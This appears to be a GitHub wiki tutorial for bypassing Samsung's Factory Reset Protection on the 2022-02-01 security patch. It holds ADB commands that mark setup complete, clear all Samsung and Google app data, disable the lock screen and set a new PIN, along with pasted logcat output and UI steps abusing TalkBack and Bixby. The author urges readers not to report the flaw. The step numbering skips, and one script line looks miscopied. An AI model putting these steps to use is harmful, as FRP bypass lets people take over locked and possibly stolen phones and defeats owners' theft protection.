⚠️ Patched from 2022-04-01: you must find your way around, go go hack or die! I dont have any android device anymore so I cant try, if I will get one - I'll update this post!
No worries, I got you covered with a newer version (they are fast but not fast enough so I decided to share this wiki to the public - This hack works perfect for all Samsung devices with latest securit patch (2022-02-01) while the wiki is created it works awesome still (2022-02-21),.This method does NOT work on Android 11 so you have an Android 11 FPR locked device so you can upgrade to the latest firmware from Samsung)
- I never report vulnerabilities to companies, they make their money if you are one of my followers here at @Github and want to report anything to the idiots feel feel free, I will succeed again and again and again so for me personally it does not matter BUT it may cause other users so think twice before contacting the companies, they have enough developers to figure out things on their own and be happy as long as it works! My old screenshot method wich I found some idiot reported this vulnerability was patched fast unfortunately, but for whose benefit? Not to ours, just for the greedy companies out there.
content insert --uri content://settings/secure --bind name:s:user_setup_complete --bind value:s:1
02-20 23:25:40.306 936 8470 D RestrictionPolicy: isSettingsChangesAllowedAsUser, userId 0 : true
02-20 23:25:40.306 936 8470 D SettingsProvider: ret = 1
02-20 23:25:40.318 936 8470 I GenerationRegistry: mBackingStore.isClosed() : false
02-20 23:25:40.320 5655 5655 I AODSettingsHelper: content://settings/secure/user_setup_complete changed
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: mKey=user_setup_complete, mIntValue=1, mStringValue=null
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: onChange() COMPLETED elapsed= 2
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: **### onSettingsValueChanged for content://settings/secure/user_setup_complete
02-20 23:25:40.322 5655 5655 I AODSettingsHelper: **### onSettingsValueChanged callbackList == null
02-20 23:25:40.323 936 1133 D PackageManager: SetupWizardFinished: true
02-20 23:25:40.323 17664 17664 D hw-ProcessState: Binder ioctl to enable oneway spam detection failed: Invalid argument
02-20 23:25:40.325 17664 17664 D AndroidRuntime: Shutting down VM
02-20 23:25:40.344 5655 5655 I AODSettingsHelper: content://settings/secure/user_setup_complete changed
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: mKey=user_setup_complete, mIntValue=1, mStringValue=null
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: onChange() COMPLETED elapsed= 1
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: **### onSettingsValueChanged for content://settings/secure/user_setup_complete
02-20 23:25:40.346 5655 5655 I AODSettingsHelper: **### onSettingsValueChanged callbackList == null
02-20 23:25:40.346 5655 5655 D DeviceProvisionedControllerImpl: Setting change: content://settings/secure/user_set
56) You can now press next, accept license and policies and wifi should already be fixed so press next and you will now see:
62) Say 'Google Assistant' and when bixby launches, press volume up and power to turn off talkback settings
64) Go to "Apps" sections wich has been locked all the time until we added our google account as you probably tried already, settings application crashing when pressing on it but now its unlocked:
67) Select: One UI Home and when you press on it System UI will launch and you bypassing the earlier setup wizard
You have just hacked samsung's latest security patch and there are a thousand reasons why i do not use cell phones ;)
Since adb shell is still open, clear all samsung applications so we can take control over lock settings without any bruteforcing:
cmd package list packages|cut -d: -f2|egrep samsung > /storage/self/primary/clear.txt
sed 's/^/pm clear --user 0 /g' /storage/self/primary/clear.txt > /storage/self/primary/clear_script.sh
sh -x /storage/self/primary/clear_script.sh
cmd package list packages|cut -d: -f2|egrep google > /storage/self/primary/clear_google_apps.txt
sed 's/^/pm clear --user 0 /g' /storage/self/primary/clear.txt > /storage/self/primary/clear_google_apps.sh
sh -x /storage/self/primary/clear_script.sh
Your lock settings is NOT disabled if you are using an FRP locked Device, however you can confirm this with cmd:
cmd lock_settings get-disabled
cmd lock_settings is the new way we used locksettings in past (you probably seen my wbruter script wich is very old and slow nowdays, use cmd instead) and since lock_settings was introduced in cmd we simply can use below to disable lock screen without any hacking:
cmd lock_settings set-disabled true
Since we still love ADB and working in cli rather then GUI (at least that's me) set your pin code with:
cmd locksettings --set-pin XXXX XXX
And for GUI fantasts, open settings and browse to Biometrics and Security either with below command or via your homescreen
am start -a android.settings.SETTINGS
Send me an email or contact me on ÍRC:
- iRC: wuseman@Libera
Enter Libera's network via your own client 'chat.libera.chat:+6697 or use their new web client here.
- Mail: wuseman@nr1.nu
This tutorial is licensed under the GNU General Public License v3.0 - See the LICENSE.md file for details - Feel free to copy this wiki but if you do, please share an url to this original post. Thanks alot!
- Happy Hacking and Never Give up!